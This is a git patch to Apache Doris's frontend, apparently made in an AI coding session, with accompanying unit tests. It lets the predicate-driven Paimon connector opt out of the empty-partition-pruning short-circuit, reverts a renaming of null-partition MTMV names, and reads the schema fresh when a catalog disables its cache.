https://claude.ai/code/session_011mTrPcvMZtFjsxWJM5TRnG --- .../api/scan/ConnectorScanPlanProvider.java | 21 +++ .../paimon/PaimonScanPlanProvider.java | 25 +++- .../PaimonScanPlanProviderCapabilityTest.java | 51 ++++++++ .../doris/catalog/ListPartitionItem.java | 32 +---- .../PluginDrivenMvccExternalTable.java | 59 ++++++++- .../datasource/PluginDrivenScanNode.java | 33 ++++- .../doris/catalog/ListPartitionItemTest.java | 57 ++++---- .../PluginDrivenMvccExternalTableTest.java | 122 ++++++++++++++++-- ...ginDrivenScanNodePartitionPruningTest.java | 38 ++++++ 9 files changed, 349 insertions(+), 89 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderCapabilityTest.java diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java index 6dbc3b8e6df511..0fe14be17534a0 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanPlanProvider.java @@ -51,6 +51,27 @@ default ConnectorScanRangeType getScanRangeType() { return ConnectorScanRangeType.FILE_SCAN; } + /** + * Whether this connector is PREDICATE-DRIVEN and therefore opts out of the FE prune-to-zero + * short-circuit. + * + *

    A connector whose {@link #planScan} re-plans through its own SDK from the pushed predicate and + * does NOT consume {@code requiredPartitions} (e.g. paimon) must return {@code true}. The engine then + * maps a GENUINE prune-to-zero (FE pruning emptied the partition set over a non-empty universe) to + * scan-all instead of short-circuiting to zero rows. This is required for master parity once a + * genuine-null partition is rendered as a NON-null sentinel ({@code isNull=false}): {@code col IS NULL} + * prunes every partition away, yet the genuine-null rows must still be returned via the pushed + * predicate (the legacy {@code PaimonScanNode} never consults the FE partition selection).

    + * + *

    Default {@code false}: connectors that genuinely restrict the read to the pruned partitions + * (e.g. MaxCompute, whose read session spans only {@code requiredPartitions}) keep the short-circuit.

    + * + * @return {@code true} to disable the prune-to-zero short-circuit for this connector + */ + default boolean ignorePartitionPruneShortCircuit() { + return false; + } + /** * Plans the scan for the given table, returning a list of scan ranges. * diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 634c3180ccaa54..44189bb2002ef6 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -118,11 +118,15 @@ * default chain (6-arg → 5-arg → 4-arg) routes correctly with {@code requiredPartitions} * dropped. As of B5 the connector emits {@code partition_columns} (see * {@code PaimonConnectorMetadata.buildTableSchema}), so FE now treats Paimon tables as partitioned and - * the Nereids-pruned set feeds FE EXPLAIN ({@code partition=N/M}) and the generic scan node's - * pruned-empty short-circuit only — never {@code planScan}. For an explicit time-travel pin the - * connector deliberately reports an empty partition-item map and defers pruning to this predicate - * pushdown; {@code PluginDrivenScanNode.resolveRequiredPartitions} is guarded so that empty-universe - * pin scans-all rather than short-circuiting to zero splits. None of this affects read-row correctness. + * the Nereids-pruned set feeds FE EXPLAIN ({@code partition=N/M}) only. Because Paimon is fully + * predicate-driven, this provider returns {@code true} from {@link #ignorePartitionPruneShortCircuit()}: + * a GENUINE prune-to-zero (FE pruning emptied the partition set) is NOT short-circuited to zero rows but + * mapped to scan-all, so {@code planScan} re-plans from the pushed predicate. This is load-bearing once a + * genuine-null partition is rendered as a NON-null sentinel ({@code isNull=false}, master parity): {@code + * col IS NULL} prunes every partition away at FE, yet the genuine-null rows must still be returned via the + * pushed predicate (the legacy {@code PaimonScanNode} never consults the FE partition selection). The + * time-travel pin (empty partition-item map over an empty universe) was already guarded the same way in + * {@code PluginDrivenScanNode.resolveRequiredPartitions}. None of this affects read-row correctness. */ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { @@ -305,6 +309,17 @@ public List planScan( return planScanInternal(session, handle, columns, filter, false); } + /** + * Paimon is predicate-driven: {@code planScan} ignores {@code requiredPartitions} and re-plans through + * the SDK with the pushed predicate, so a FE prune-to-zero must scan-all rather than short-circuit to + * zero rows (required for {@code col IS NULL} parity once a genuine-null partition renders as a NON-null + * sentinel). See the class-level partition-pruning note. + */ + @Override + public boolean ignorePartitionPruneShortCircuit() { + return true; + } + /** * COUNT(*)-pushdown-aware scan entry (FIX-COUNT-PUSHDOWN). The generic {@code PluginDrivenScanNode} * forwards the no-grouping {@code COUNT(*)} signal here via the SPI's count-pushdown overload. diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderCapabilityTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderCapabilityTest.java new file mode 100644 index 00000000000000..5147af54ec6107 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderCapabilityTest.java @@ -0,0 +1,51 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * Guards the predicate-driven scan capability: paimon must opt OUT of the FE prune-to-zero short-circuit + * ({@link ConnectorScanPlanProvider#ignorePartitionPruneShortCircuit()} == true) so that, with master-parity + * {@code isNull=false} genuine-null partitions, a {@code col IS NULL} query (which prunes every partition away + * at FE) is NOT short-circuited to zero rows but re-planned from the pushed predicate — restoring the + * genuine-null row (regression test_paimon_runtime_filter_partition_pruning qt_null_partition_4). The SPI + * default stays {@code false} so partition-restricting connectors (e.g. MaxCompute) keep the short-circuit. + */ +public class PaimonScanPlanProviderCapabilityTest { + + @Test + public void paimonOptsOutOfPruneToZeroShortCircuit() { + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), null); + Assertions.assertTrue(provider.ignorePartitionPruneShortCircuit(), + "paimon is predicate-driven and must opt out of the prune-to-zero short-circuit"); + } + + @Test + public void spiDefaultKeepsShortCircuit() { + // A connector that does not override the capability keeps the short-circuit (MaxCompute parity). + ConnectorScanPlanProvider defaultProvider = (session, handle, columns, filter) -> Collections.emptyList(); + Assertions.assertFalse(defaultProvider.ignorePartitionPruneShortCircuit(), + "the SPI default must keep the prune-to-zero short-circuit"); + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java b/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java index 22b6e457744dd1..cccd1bcbc508f0 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java +++ b/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java @@ -82,16 +82,17 @@ public PartitionItem getIntersect(PartitionItem newItem) { @Override public PartitionKeyDesc toPartitionKeyDesc() { - List> inValues = partitionKeys.stream().map(ListPartitionItem::toDisplayPartitionValues) + List> inValues = partitionKeys.stream().map(PartitionInfo::toPartitionValue) .collect(Collectors.toList()); return PartitionKeyDesc.createIn(inValues); } @Override public PartitionKeyDesc toPartitionKeyDesc(int pos) throws AnalysisException { + List> inValues = partitionKeys.stream().map(PartitionInfo::toPartitionValue) + .collect(Collectors.toList()); Set> res = Sets.newHashSet(); - for (PartitionKey partitionKey : partitionKeys) { - List values = toDisplayPartitionValues(partitionKey); + for (List values : inValues) { if (values.size() <= pos) { throw new AnalysisException( String.format("toPartitionKeyDesc IndexOutOfBounds, values: %s, pos: %d", values.toString(), @@ -102,31 +103,6 @@ public PartitionKeyDesc toPartitionKeyDesc(int pos) throws AnalysisException { return PartitionKeyDesc.createIn(Lists.newArrayList(res)); } - /** - * Like {@link PartitionInfo#toPartitionValue} but, for a genuine-NULL partition value whose key carries a - * sized {@code originHiveKeys} (set by connectors that render NULL via a sentinel, e.g. paimon's - * partition.default-name normalized to Doris's {@code __HIVE_DEFAULT_PARTITION__}), uses that sentinel - * string as the DISPLAY value. The value stays {@code isNull=true}, so {@code getValue(type)} is still a - * {@link org.apache.doris.analysis.NullLiteral} and partition pruning / {@code col IS NULL} are unaffected; - * only the rendered partition name differs. This gives a genuine-NULL partition a DISTINCT MTMV name - * (e.g. {@code p_HIVEDEFAULTPARTITION}) instead of {@code p_NULL}, which would otherwise collide with a - * literal string {@code 'NULL'} partition (CI 973411 test_paimon_mtmv "Duplicated named partition: p_NULL"). - * For internal OLAP partitions {@code originHiveKeys} is empty, so this is a no-op. - */ - private static List toDisplayPartitionValues(PartitionKey partitionKey) { - List values = PartitionInfo.toPartitionValue(partitionKey); - List originHiveKeys = partitionKey.getOriginHiveKeys(); - if (originHiveKeys.size() != partitionKey.getKeys().size()) { - return values; - } - for (int i = 0; i < values.size(); i++) { - if (values.get(i).isNullPartition()) { - values.set(i, new PartitionValue(originHiveKeys.get(i), true)); - } - } - return values; - } - @Override public boolean isGreaterThanSpecifiedTime(int pos, Optional dateFormatOptional, long nowTruncSubSec) throws AnalysisException { diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java index 90acd698bc5ea4..75d9e2ab37362c 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java @@ -58,6 +58,7 @@ import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.OptionalLong; import java.util.Set; import java.util.regex.Pattern; import java.util.stream.Collectors; @@ -198,12 +199,17 @@ private static ListPartitionItem toListPartitionItem(String partitionName, List< Preconditions.checkState(partitionValues.size() == types.size(), partitionName + " vs. " + types); List values = Lists.newArrayListWithExpectedSize(types.size()); for (String partitionValue : partitionValues) { - // A value equal to the Doris-canonical null sentinel marks a genuine NULL partition. - // Connectors normalize their own sentinel (e.g. paimon's partition.default-name) to this - // in the rendered partition name, mirroring TablePartitionValues.toListPartitionItem so - // that `col IS NULL` prunes to the null partition instead of pruning it away. - values.add(new PartitionValue(partitionValue, - TablePartitionValues.HIVE_DEFAULT_PARTITION.equals(partitionValue))); + // Master parity (PaimonUtil.toListPartitionItem: `new PartitionValue(value, false)`): every + // partition value — including a genuine-NULL value the connector rendered via its sentinel + // (e.g. paimon's partition.default-name normalized to __HIVE_DEFAULT_PARTITION__) — builds a + // NON-null (isNull=false) partition value. So the genuine-null partition is a plain + // StringLiteral; an MTMV refresh emits `col IN ('')` which the scan's genuine SQL-NULL + // rows never match (the null rows are dropped from the MV, like master), and its MTMV name is + // derived from the sentinel (distinct from a literal 'NULL' partition — no p_NULL collision). + // `col IS NULL` still returns the genuine-null rows: the paimon scan is predicate-driven and the + // connector opts out of the FE prune-to-zero short-circuit (see Connector capability consulted by + // PluginDrivenScanNode.resolveRequiredPartitions), so the SDK re-plans with the pushed predicate. + values.add(new PartitionValue(partitionValue, false)); } PartitionKey key = PartitionKey.createListPartitionKeyWithTypes(values, types, true); return new ListPartitionItem(Lists.newArrayList(key)); @@ -373,11 +379,50 @@ public Optional getSchemaCacheValue() { return getLatestSchemaCacheValue(); // latest (B5a pin has pinnedSchema==null, or no pin) } - /** Seam for the LATEST (non-pinned) schema; default delegates to the cached super. Overridable in tests. */ + /** + * The LATEST (non-pinned) schema. For a no-cache catalog (the connector's {@code schemaCacheTtlSecondOverride} + * is {@code <= 0}, e.g. {@code meta.cache.paimon.table.ttl-second=0}) the schema is read FRESH via + * {@link #initSchema()}, bypassing the generic name-keyed schema cache. + * + *

    Why bypass rather than rely on the cache TTL: the SPI routes the latest schema through the generic + * {@code DefaultExternalMetaCache} schema entry keyed by table NAME only (no schemaId, unlike master's + * {@code PaimonSchemaCacheKey(nameMapping, schemaId)}), and that entry's TTL spec is frozen at first build + * ({@code AbstractExternalMetaCache.initCatalog} computeIfAbsent), so a {@code ttl-second=0} cannot reliably + * bust it after an external schema change. Reading fresh restores master's single-knob semantics + * ({@code meta.cache.paimon.table.ttl-second=0} -> always-fresh schema) and is cheap at ttl=0 by definition; + * {@code initSchema()} reloads via the connector's live {@code catalog.getTable} (master parity). The cached + * catalog (override absent or {@code > 0}) keeps the cached path; {@code REFRESH TABLE} still busts it. + */ protected Optional getLatestSchemaCacheValue() { + Connector localConnector = ((PluginDrivenExternalCatalog) catalog).getConnector(); + if (schemaCacheDisabled(localConnector)) { + return initSchema(); + } + return cachedSchemaCacheValue(); + } + + /** + * The generic name-keyed schema cache read ({@code super.getSchemaCacheValue()}). Isolated as a seam so + * {@link #getLatestSchemaCacheValue()} can bypass it for a no-cache catalog and so tests can stub it. + */ + protected Optional cachedSchemaCacheValue() { return super.getSchemaCacheValue(); } + /** + * Whether the connector disables its schema cache (its {@code schemaCacheTtlSecondOverride()} is present + * and {@code <= 0} — the no-cache catalog, {@code meta.cache.paimon.table.ttl-second=0}). Such a catalog + * must serve a FRESH schema on every read, restoring master's single-knob semantics. A null/empty/positive + * override keeps the cached path. + */ + static boolean schemaCacheDisabled(Connector connector) { + if (connector == null) { + return false; + } + OptionalLong override = connector.schemaCacheTtlSecondOverride(); + return override != null && override.isPresent() && override.getAsLong() <= 0; + } + // ──────────────────── partition view (snapshot-aware) ──────────────────── @Override diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java index ec94773dde0dd1..6f3cad7a2dffdc 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java @@ -200,6 +200,25 @@ public void setSelectedPartitions(SelectedPartitions selectedPartitions) { * */ static List resolveRequiredPartitions(SelectedPartitions selectedPartitions) { + return resolveRequiredPartitions(selectedPartitions, false); + } + + /** + * Overload that lets a PREDICATE-DRIVEN connector opt out of the genuine prune-to-zero short-circuit. + * + *

    A connector whose {@link ConnectorScanPlanProvider#ignorePartitionPruneShortCircuit()} is {@code + * true} (e.g. paimon, whose {@code planScan} ignores {@code requiredPartitions} and re-plans through the + * SDK with the pushed predicate) must NOT be short-circuited to zero rows when FE pruning empties the + * partition set: with master-parity {@code isNull=false} a genuine-null partition renders as a non-null + * sentinel, so {@code col IS NULL} prunes every partition away, yet the genuine-null rows must still be + * returned via the pushed predicate (regression {@code qt_null_partition_4}). For such a connector a + * prune-to-zero maps to {@code null} (scan-all) instead of the empty list, exactly as the legacy + * {@code PaimonScanNode} (which never consults {@code selectedPartitions}). A non-empty pruned set is + * still forwarded unchanged. For every other connector ({@code ignorePartitionPruneShortCircuit=false}) + * the behavior is identical to {@link #resolveRequiredPartitions(SelectedPartitions)}.

    + */ + static List resolveRequiredPartitions(SelectedPartitions selectedPartitions, + boolean ignorePartitionPruneShortCircuit) { if (selectedPartitions == null || !selectedPartitions.isPruned) { return null; } @@ -218,6 +237,13 @@ static List resolveRequiredPartitions(SelectedPartitions selectedPartiti if (selectedPartitions.selectedPartitions.isEmpty() && selectedPartitions.totalPartitionNum == 0) { return null; } + // A predicate-driven connector re-plans through its SDK with the pushed predicate (its planScan + // ignores requiredPartitions), so a GENUINE prune-to-zero must NOT short-circuit the scan — return + // scan-all (null) and let planScan answer from the predicate (e.g. paimon `col IS NULL` over a + // genuine-null partition the FE pruner rendered as a non-null sentinel). Master PaimonScanNode parity. + if (ignorePartitionPruneShortCircuit && selectedPartitions.selectedPartitions.isEmpty()) { + return null; + } return new ArrayList<>(selectedPartitions.selectedPartitions.keySet()); } @@ -624,8 +650,11 @@ public List getSplits(int numBackends) throws UserException { // Push the Nereids partition-pruning result down to the connector so the read session // covers only the surviving partitions. A pruned-to-zero set means no data to read, - // mirroring legacy MaxComputeScanNode.getSplits()'s empty-selection short-circuit. - List requiredPartitions = resolveRequiredPartitions(selectedPartitions); + // mirroring legacy MaxComputeScanNode.getSplits()'s empty-selection short-circuit — UNLESS the + // connector is predicate-driven (ignorePartitionPruneShortCircuit), in which case a prune-to-zero + // maps to scan-all and planScan re-plans from the pushed predicate (paimon `col IS NULL` parity). + List requiredPartitions = resolveRequiredPartitions( + selectedPartitions, scanProvider.ignorePartitionPruneShortCircuit()); // Surface the partition counts for EXPLAIN (partition=N/M) and SQL-block-rule enforcement, // mirroring legacy MaxComputeScanNode.getSplits():720-722. Set BEFORE the pruned-to-zero // short-circuit below so a 0-partition selection still reports partition=0/total (e.g. WHERE diff --git a/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java b/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java index 9f56dc2921eec6..42497bf1ba0478 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java @@ -30,49 +30,40 @@ import java.util.List; /** - * Tests for {@link ListPartitionItem#toPartitionKeyDesc} null-partition display handling (FIX-3, CI 973411). + * Tests for {@link ListPartitionItem#toPartitionKeyDesc} null-partition display handling. + * + *

    Guards the master-parity rendering of a genuine-NULL partition: its MTMV partition NAME must be the bare + * {@code p_NULL}, the same as on master ({@link PartitionInfo#toPartitionValue} renders a {@code NullLiteral} + * key as the keyword {@code NULL}). FIX-3 (CI 973411, reverted) substituted the {@code originHiveKeys} sentinel + * for the display value, renaming the hive default-partition MV to {@code p_HIVEDEFAULTPARTITION} and breaking + * regression test_hive_default_mtmv (asserts {@code p_NULL}) and test_upgrade_downgrade_mtmv (the related-desc + * vs MV-OLAP-desc partition-mapping join, which only matches when both sides render symmetrically). */ public class ListPartitionItemTest { /** - * A genuine-NULL partition (connector renders it via the {@code __HIVE_DEFAULT_PARTITION__} sentinel and - * marks the key isNull) and a literal string {@code 'NULL'} partition must produce DISTINCT MTMV partition - * names. Before FIX-3 both rendered to the bare {@code NULL} keyword -> both named {@code p_NULL} -> - * "Duplicated named partition: p_NULL" (CI 973411 test_paimon_mtmv on the paimon null_partition table, - * which has rows for genuine NULL, 'null' and 'NULL'). The genuine-null key must keep isNull=true so - * {@code region IS NULL} still prunes to it (the IS-NULL-prune fix is preserved); only the DISPLAY name - * changes. + * A genuine-NULL partition (e.g. a hive {@code __HIVE_DEFAULT_PARTITION__} default partition, built isNull + * with the sentinel preserved as originHiveKeys) must render its MTMV partition name as the bare + * {@code p_NULL} — identical to master — so that (a) test_hive_default_mtmv:93 finds p_NULL and (b) the + * MTMV-OLAP partition (which has no originHiveKeys) renders the SAME name, keeping the sync-compare join + * symmetric. The value must still resolve to a NULL literal so {@code col IS NULL} pruning is unaffected. */ @Test - public void testNullPartitionGetsDistinctNameButStaysNull() throws AnalysisException { + public void testGenuineNullPartitionRendersAsPNull() throws AnalysisException { List types = Collections.singletonList(Type.VARCHAR); - // Genuine NULL partition as a paimon/hive connector builds it: a NULL literal whose origin-hive key + // Genuine NULL partition as a hive/paimon connector builds it: a NULL literal whose origin-hive key // preserves the canonical sentinel string. PartitionKey nullKey = PartitionKey.createListPartitionKeyWithTypes( Collections.singletonList(new PartitionValue(TablePartitionValues.HIVE_DEFAULT_PARTITION, true)), types, true); - // A literal string 'NULL' partition value (NOT a genuine null). - PartitionKey stringNullKey = PartitionKey.createListPartitionKeyWithTypes( - Collections.singletonList(new PartitionValue("NULL", false)), types, true); - ListPartitionItem nullItem = new ListPartitionItem(Lists.newArrayList(nullKey)); - ListPartitionItem stringNullItem = new ListPartitionItem(Lists.newArrayList(stringNullKey)); - - String nullName = MTMVPartitionUtil.generatePartitionName(nullItem.toPartitionKeyDesc(0)); - String stringNullName = MTMVPartitionUtil.generatePartitionName(stringNullItem.toPartitionKeyDesc(0)); - // MUTATION: reverting toPartitionKeyDesc to render the null value as the bare "NULL" keyword makes - // both names "p_NULL" -> this assertion (and the CREATE MTMV) red. - Assertions.assertNotEquals(nullName, stringNullName, - "genuine-null and string-'NULL' partitions must produce distinct MTMV names"); - Assertions.assertEquals("p_NULL", stringNullName, - "the literal string 'NULL' partition must stay p_NULL"); - Assertions.assertEquals("p_HIVEDEFAULTPARTITION", nullName, - "the genuine-null partition must be named from the sentinel, not the bare NULL keyword"); + Assertions.assertEquals("p_NULL", + MTMVPartitionUtil.generatePartitionName(nullItem.toPartitionKeyDesc(0)), + "a genuine-null partition must render as p_NULL (master parity), not p_HIVEDEFAULTPARTITION"); // The null partition's desc value must still resolve to a NULL literal so `col IS NULL` prunes to it. - // MUTATION: dropping isNull on the substituted display value -> getValue is a non-null literal -> red. PartitionValue nullDescValue = nullItem.toPartitionKeyDesc(0).getInValues().get(0).get(0); Assertions.assertTrue(nullDescValue.isNullPartition(), "the null partition desc value must stay isNull"); @@ -81,20 +72,18 @@ public void testNullPartitionGetsDistinctNameButStaysNull() throws AnalysisExcep } /** - * Internal OLAP list partitions carry NO originHiveKeys, so the FIX-3 display substitution is a no-op: - * a genuine NULL OLAP partition value keeps rendering as the bare {@code NULL} keyword (p_NULL). + * An internal OLAP null partition (no originHiveKeys) renders as {@code p_NULL} — unchanged by, and after, + * the FIX-3 revert. Kept as a symmetry anchor for {@link #testGenuineNullPartitionRendersAsPNull}: both the + * connector-side genuine-null item and the MV-OLAP item must produce the SAME p_NULL name. */ @Test - public void testOlapNullPartitionUnchanged() throws AnalysisException { + public void testOlapNullPartitionRendersAsPNull() throws AnalysisException { List types = Collections.singletonList(Type.VARCHAR); - // isHive=false -> originHiveKeys stays empty -> guard skips -> legacy behavior. PartitionKey olapNullKey = PartitionKey.createListPartitionKeyWithTypes( Collections.singletonList(new PartitionValue("NULL", true)), types, false); ListPartitionItem item = new ListPartitionItem(Lists.newArrayList(olapNullKey)); - // MUTATION: applying the sentinel substitution unconditionally (ignoring the originHiveKeys guard) - // would change this to p_HIVEDEFAULTPARTITION -> red. Assertions.assertEquals("p_NULL", MTMVPartitionUtil.generatePartitionName(item.toPartitionKeyDesc(0)), - "an OLAP null partition (no originHiveKeys) must be unaffected by the FIX-3 substitution"); + "an OLAP null partition (no originHiveKeys) must render as p_NULL"); } } diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java index bee83207b83726..6a6a061bcd3fea 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java @@ -56,6 +56,7 @@ import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.OptionalLong; /** * Tests for {@link PluginDrivenMvccExternalTable}, the generic MVCC/MTMV-capable plugin table. @@ -136,24 +137,109 @@ public void testGetNameToPartitionItemsBuildsKeyFromRenderedDateName() { } @Test - public void testHiveDefaultSentinelBuildsNullPartitionKey() { - // The connector normalizes a genuine NULL partition value (e.g. paimon's partition.default-name - // "__DEFAULT_PARTITION__") to the Doris-canonical sentinel in the rendered partition name. + public void testHiveDefaultSentinelBuildsNonNullStringKey() { + // Master parity (PaimonUtil.toListPartitionItem uses `new PartitionValue(value, false)` + // unconditionally): a genuine-NULL partition value — which the connector renders via the + // __HIVE_DEFAULT_PARTITION__ sentinel — builds a NON-null partition key (isNull=false), i.e. the + // literal sentinel string, NOT a NullLiteral. An MTMV refresh therefore emits + // `region IN ('__HIVE_DEFAULT_PARTITION__')`, which the scan's genuine SQL-NULL rows never match, so + // the null rows are dropped from the MV exactly like master ("Will lose null data", regression + // test_paimon_mtmv). `WHERE region IS NULL` still returns the genuine-null rows because the paimon + // scan is predicate-driven and does NOT short-circuit on an FE prune-to-zero (the connector's + // ignorePartitionPruningShortCircuit capability), NOT because the partition key is a NullLiteral. + // VARCHAR column: the sentinel parses to a plain StringLiteral (a DATE column can't parse it, so the + // bridge logs+skips that partition — also master parity, generatePartitionInfo's per-partition catch). Fixture f = Fixture.with(Collections.singletonList( - cpi("dt=" + TablePartitionValues.HIVE_DEFAULT_PARTITION, TS_2024_01_01))); + cpi("dt=" + TablePartitionValues.HIVE_DEFAULT_PARTITION, TS_2024_01_01)), Type.VARCHAR); Map items = f.table.getNameToPartitionItems(Optional.empty()); Assertions.assertEquals(1, items.size()); PartitionItem item = items.get("dt=" + TablePartitionValues.HIVE_DEFAULT_PARTITION); Assertions.assertTrue(item instanceof ListPartitionItem, "expected a ListPartitionItem"); PartitionKey key = ((ListPartitionItem) item).getItems().get(0); - // WHY: a value equal to the canonical null sentinel must build a NULL partition key (isNull) so - // `dt IS NULL` prunes TO this partition. Before the fix toListPartitionItem hardcoded isNull=false, - // so the key was a non-null literal "__HIVE_DEFAULT_PARTITION__", IS NULL matched nothing, and the - // null partition was pruned away (empty result — the bug this fixes). MUTATION: reverting to - // new PartitionValue(value, false) -> the key is a non-null literal -> isNullLiteral() false -> red. - Assertions.assertTrue(key.getKeys().get(0).isNullLiteral(), - "a __HIVE_DEFAULT_PARTITION__ partition value must build a NULL (isNull) partition key"); + // MUTATION: marking the sentinel isNull=true -> the key is a NullLiteral -> red. + Assertions.assertFalse(key.getKeys().get(0).isNullLiteral(), + "master parity: a __HIVE_DEFAULT_PARTITION__ value must build a NON-null literal key (isNull=false)"); + Assertions.assertEquals(TablePartitionValues.HIVE_DEFAULT_PARTITION, + key.getKeys().get(0).getStringValue(), + "the genuine-null partition key must carry the sentinel string verbatim (a plain StringLiteral)"); + } + + // ==================== no-cache schema: bypass the name-keyed cache and read fresh ==================== + + @Test + public void testSchemaCacheDisabledByConnectorTtl() { + // ttl-second <= 0 (the no-cache catalog) -> the generic name-keyed schema cache (no schemaId) must be + // bypassed and the schema read fresh; an absent/positive override keeps the cached path. + Connector noCache = Mockito.mock(Connector.class); + Mockito.when(noCache.schemaCacheTtlSecondOverride()).thenReturn(OptionalLong.of(0)); + Assertions.assertTrue(PluginDrivenMvccExternalTable.schemaCacheDisabled(noCache), + "ttl-second=0 (no-cache catalog) must disable the schema cache"); + + Connector negative = Mockito.mock(Connector.class); + Mockito.when(negative.schemaCacheTtlSecondOverride()).thenReturn(OptionalLong.of(-1)); + Assertions.assertTrue(PluginDrivenMvccExternalTable.schemaCacheDisabled(negative), + "a negative ttl-second also disables the schema cache"); + + Connector withCache = Mockito.mock(Connector.class); + Mockito.when(withCache.schemaCacheTtlSecondOverride()).thenReturn(OptionalLong.empty()); + Assertions.assertFalse(PluginDrivenMvccExternalTable.schemaCacheDisabled(withCache), + "an absent override (the cached catalog) keeps the schema cache"); + + Connector positive = Mockito.mock(Connector.class); + Mockito.when(positive.schemaCacheTtlSecondOverride()).thenReturn(OptionalLong.of(3600)); + Assertions.assertFalse(PluginDrivenMvccExternalTable.schemaCacheDisabled(positive), + "a positive ttl-second keeps the schema cache"); + + Assertions.assertFalse(PluginDrivenMvccExternalTable.schemaCacheDisabled(null), + "a null connector (uninitialized) keeps the engine default"); + } + + @Test + public void testNoCacheReadsFreshSchemaElseCached() { + // The no-cache catalog must serve the FRESH (initSchema) schema, bypassing the cached (super) path; + // the cached catalog serves the cached value. This restores master's meta.cache.paimon.table + // .ttl-second=0 -> always-fresh-schema after an external ALTER (regression test_paimon_table_meta_cache + // line 112, no-cache desc expected 3 cols but got the stale 2). + SchemaCacheValue cached = new PluginDrivenSchemaCacheValue( + Collections.singletonList(new Column("c", Type.INT)), + Collections.emptyList(), Collections.emptyList()); + SchemaCacheValue fresh = new PluginDrivenSchemaCacheValue( + Arrays.asList(new Column("c", Type.INT), new Column("c2", Type.INT)), + Collections.emptyList(), Collections.emptyList()); + + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + TestablePluginCatalog catalog = new TestablePluginCatalog(metadata, session); + Connector connector = catalog.getConnector(); + ExternalDatabase db = mockDb("REMOTE_DB"); + + PluginDrivenMvccExternalTable table = + new PluginDrivenMvccExternalTable(1L, "tbl", "REMOTE_TBL", catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + } + + @Override + public Optional initSchema() { + return Optional.of(fresh); + } + + @Override + protected Optional cachedSchemaCacheValue() { + return Optional.of(cached); + } + }; + + // no-cache (ttl=0): bypass the cache -> fresh + Mockito.when(connector.schemaCacheTtlSecondOverride()).thenReturn(OptionalLong.of(0)); + Assertions.assertSame(fresh, table.getLatestSchemaCacheValue().orElse(null), + "no-cache catalog must read the fresh schema (initSchema), not the cached value"); + + // with-cache (override absent): cached + Mockito.when(connector.schemaCacheTtlSecondOverride()).thenReturn(OptionalLong.empty()); + Assertions.assertSame(cached, table.getLatestSchemaCacheValue().orElse(null), + "cached catalog must read the cached schema value"); } // ==================== single-pin invariant: no re-query when pin supplied ==================== @@ -740,6 